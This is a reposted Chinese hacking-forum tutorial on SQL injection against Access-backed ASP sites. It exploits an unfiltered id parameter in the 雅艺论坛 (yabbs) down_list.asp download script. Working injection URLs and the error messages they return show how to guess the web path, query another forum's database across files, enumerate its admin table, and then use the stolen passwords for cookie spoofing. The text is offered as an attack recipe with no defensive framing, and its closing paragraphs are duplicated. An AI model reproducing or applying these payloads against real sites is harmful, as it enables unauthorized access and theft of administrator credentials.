本文作者:
[email protected] 来源: http://www.eviloctal.com/forum/
此文已在《黑客X档案》发表
看到这个题目各位大虾小虾先别急着找东西砸我,的确现在跨库查询的资料随便找找都可以找到一大堆,不像以前那样想看点资料还得对着一大堆E文敲脑袋。今天我要说的是我前一段时间发现的一个跨库查询的一个新玩法,大家可要仔细听哦。
照例先介绍一下,在大概一个月前幻影旅团和灰色轨迹对这个问题进行了一些讨论就是在递交:
http://www.target.com/show.asp?id=1 or 0<>(select count(*) from admin.c)
会出现如下的错误提示:
Microsoft JET Database Engine 错误 '80004005'
找不到文件 'C:\WINNT\system32\admin.mdb'。
看到了吧,如果看过xhacker写的那份学习报告的人肯定就已经兴奋起来了,因为那份报告隐约提到了Access的一个漏洞可以Dir C:\ /s!让我们继续玩下去吧,递交:
http://www.target.com/show.asp?id=1 or 0<>(select count(*) from c:\boot.ini)
返回:
Microsoft JET Database Engine 错误 '80004005'
找不到文件 'c:\boot.mdb'。
看样子from后面的部分我们是可以添加路径的了。既然想Dir当然就要访问了cmd.exe拉,再来:
http://www.target.com/show.asp?id=1 or 0<>(select count(*) from c:\winnt\system32\cmd.exe.c)
看看错误提示吧:
Microsoft JET Database Engine 错误 '80004005'
不可识别的数据库格式 'c:\winnt\system32\CMD.EXE'。
看样子我们的希望落空了哦(多次实践后你可以得到from后面跟的文件名的格式应该是这样:文件名.后缀名.任何字母,这样你才可以访问到文件名.后缀名的那个文件)。这个时候这个漏洞好象我们至多只可以确定一个目录或一个文件是否存在,当时我和很多人的想法一样认为这属于鸡肋级的漏洞,食之无味,弃之可惜。
后来在一天在帮一个朋友检测论坛安全性,看了看是用的雅艺论坛。首先我试了一下默认的数据库名。提交:http: //www.target.com/yabbs/data/1yabbs.ASP,没有提示找不到文件,看样子是没改数据库名了。但是由于扩展名是. asp,我们仍然无法下载他的数据库。没办法,只好到硬盘去翻了半天把我原来下载的一套雅艺论坛拿出来看代码。结果还真发现了一个激动人心的地方,在论坛自带的下载插件的down_list.asp这个文件发现这样的一段代码:
if request("id")="" then
response.write "您没有选择相关软件,请返回"
response.end
end if
set rs=server.createobject("adodb.recordset")
sql="select Dclass.class,DNclass.Nclass,download.showname,download.classid,download.Nclassid,download.lasthits,download.downshow from download,Dclass,DNclass where download.classid=Dclass.classid and download.Nclassid=DNclass.Nclassid and download.ID="&request("id")
[1] [2] [3]
看见没有,&request("id")这个变量没做任何过滤就代如到查询语句中去了,我们可以进行SQL注入!说的容易,在做的时候却碰到了困难,递交如下URL:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20admin)
成功返回页面,OK,存在admin表。再来确定保存用户名的列名:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20admin where username)
也成功了,保存用户名的列为username,再来看密码列:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20admin where passWord)
出错了,没关系早有准备,再试。最后几乎把我可以想到的列名全试了个遍,既然没一个对的,这下轮到我郁闷了,问了问那个朋友对数据库做了处理没有,得到的回答是没有。那就打开他默认的数据库吧,DATA目录下有两个数据库,一个是1yabbs.asp(论坛用),一个是download.asp(下载系统用),打开一看,里面竟然根本没有密码列!看样子又没的玩了,后来在和MM闲扯的时候突然想到了利用方法(别说我和MM聊天不专心啊:)。在SQL注入的时候我们有时会用到这样语句"admin.id"其中admin是表名,id是列名。那么我们可不可以结合前一段时间讨论的那个鸡肋漏洞呢,既然想到了,那就要动手实践一下才行,用开始说的方法,先来找WEB目录:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20c:\web\w.c.c)
返回如下信息:
Microsoft JET Database Engine 错误 '80004005'
'c:\web\w.c'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
/yabbs/down_list.asp,行37
目录猜错了,再来:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20d:\web\w.c.c)
这次提示就变了:
Microsoft VBscript 编译器错误 错误'8000a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft JET Database Engine 错误 '80004005'
找不到文件'd:\web\w.c'。
[1] [2] [3]
/yabbs/down_list.asp,行37
这次提示找不到文件哦,呵呵,知道WEB目录就容易了大胆的猜吧。再次递交:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20d:\web\yabbs\datayabbs.asp.c)
这次OK,直接猜到了具体的路径,提示却正巧和我的想法一样,真是#$#$@(此时兴奋的晕过去10秒......)
返回的信息为:
Microsoft VBscript 编译器错误 错误'8000a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft JET Database Engine 错误 '80040e37'
Microsoft Jet 数据库引擎找不到输入表或查询 'c'。 确定它是否存在,以及它的名称的拼写是否正确。
好了,现在一切都将变的简单化了,递交查询语句确定表和列名。
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20d:\web\yabbs\datayabbs.asp.admin%20where%20username)
成功显示,说明在1yabbs.asp这个数据库中存在admin表和username列。再来查询ID值,递交如下URL:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20d:\web\yabbs\datayabbs.asp.admin%20where%20id=1)
页面成功显示,现在不用我多说什么了吧,大家都会的,下面的部分就看大家的了。
回顾一下上面的分析过程我们可以干些什么呢?在面对一个大型站点,你知道他的数据库名(例如利用我上次写的那篇动网爆库漏洞的文章中提到的内容,得到了动网论坛的数据库名,但是他的数据库又不可以下载,而那套程序又没有其他已知的注入漏洞。)我们可以试试利用那个站里其他程序存在的SQL注入漏洞来进行跨库查询,先猜WEB路径,再进行跨库查询,从而得到动网论坛的密码,再进行COOKIE欺骗,就可以拿到前台权限了。利用的地方很多,大家可以自己去摸索一下,毕竟要把别人的技术变成自己的就要好好拓展别人的思路来研究。
(出处:http://www.sheup.com)
[1] [2] [3]
(出处:http://www.sheup.com)
[1] [2] [3] [4]
页面成功显示,现在不用我多说什么了吧,大家都会的,下面的部分就看大家的了。
回顾一下上面的分析过程我们可以干些什么呢?在面对一个大型站点,你知道他的数据库名(例如利用我上次写的那篇动网爆库漏洞的文章中提到的内容,得到了动网论坛的数据库名,但是他的数据库又不可以下载,而那套程序又没有其他已知的注入漏洞。)我们可以试试利用那个站里其他程序存在的SQL注入漏洞来进行跨库查询,先猜WEB路径,再进行跨库查询,从而得到动网论坛的密码,再进行COOKIE欺骗,就可以拿到前台权限了。利用的地方很多,大家可以自己去摸索一下,毕竟要把别人的技术变成自己的就要好好拓展别人的思路来研究。
(出处:http://www.sheup.com)
[1] [2] [3] [4] [5]